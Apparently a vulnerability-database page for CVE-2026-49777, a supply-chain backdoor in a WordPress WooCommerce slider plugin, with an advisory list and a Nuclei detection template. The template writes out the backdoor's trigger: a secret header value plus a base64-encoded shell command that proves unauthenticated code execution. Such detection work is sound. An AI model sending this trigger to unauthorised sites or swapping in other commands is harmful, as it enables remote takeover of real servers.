| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| Exploit for CVE-2026-10735 | 21 Jun 202617:46 | – | githubexploit | |
| Exploit for CVE-2026-49777 | 12 Jun 202608:26 | – | githubexploit | |
| CVE-2026-49777 | 5 Jun 202608:59 | – | attackerkb | |
| CVE-2026-49777 | 5 Jun 202610:00 | – | circl | |
| WordPress plugin Product Slider Pro for WooCommerce 安全漏洞 | 5 Jun 202600:00 | – | cnnvd | |
| CVE-2026-49777 | 5 Jun 202608:59 | – | cve | |
| CVE-2026-49777 WordPress Product Slider Pro for WooCommerce plugin < 3.5.4 - Backdoor vulnerability | 5 Jun 202608:59 | – | cvelist | |
| EUVD-2026-34792 | 5 Jun 202608:59 | – | euvd | |
| CVE-2026-49777 | 5 Jun 202609:16 | – | nvd | |
| WordPress Product Slider Pro for WooCommerce plugin < 3.5.4 - Backdoor vulnerability | 4 Jun 202609:42 | – | patchstack |
id: CVE-2026-49777
info:
name: WordPress Product Slider Pro for WooCommerce < 3.5.4 - Supply Chain Backdoor RCE
author: DhiyaneshDk
severity: critical
description: |
Improper Validation of Specified Quantity in Input vulnerability in ShapedPlugin, LLC Product Slider Pro for WooCommerce allows Malicious Software Implanted. This issue affects Product Slider Pro for WooCommerce: from n/a before 3.5.4.
impact: |
Attackers can implant malicious software, potentially compromising the system or data integrity.
remediation: |
Apply the vendor's patch or update to the latest fixed version when available.
reference:
- https://patchstack.com/database/wordpress/plugin/woo-product-slider-pro/vulnerability/wordpress-product-slider-pro-for-woocommerce-plugin-3-5-2-backdoor-vulnerability
- https://patchstack.com/articles/critical-supply-chain-compromise-in-smart-slider-3-pro-full-malware-analysis/
- https://nvd.nist.gov/vuln/detail/CVE-2026-49777
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cve-id: CVE-2026-49777
epss-score: 0.01656
epss-percentile: 0.73743
cwe-id: CWE-506
metadata:
verified: true
max-request: 1
vendor: shapedplugin
product: product_slider_pro_for_woocommerce
framework: wordpress
shodan-query: http.component:"WordPress"
fofa-query: body="wp-content/plugins/woo-product-slider-pro"
tags: cve,cve2026,wordpress,wp-plugin,backdoor,rce,supply-chain,woocommerce,unauth,shapedplugin,vkev
variables:
a: "{{rand_int(10000, 99999)}}"
b: "{{rand_int(10000, 99999)}}"
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
X-Cache-Status: nw9xQmK4
X-Cache-Key: {{base64("expr " + a + " + " + b)}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{to_number(a)+to_number(b)}}"
- type: dsl
dsl:
- "status_code == 200"
- "contains(content_type, 'text/plain')"
condition: and
extractors:
- type: dsl
dsl:
- "body"
# digest: 4b0a00483046022100a954091273ba47a1dc2b59329503e1af31ee349d773fedb2b7a1a71c0d6fb66d022100bd2dace69fc249da00e3afe64f27c2dae5dbaca77ed6af93c9b0164857fff913:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation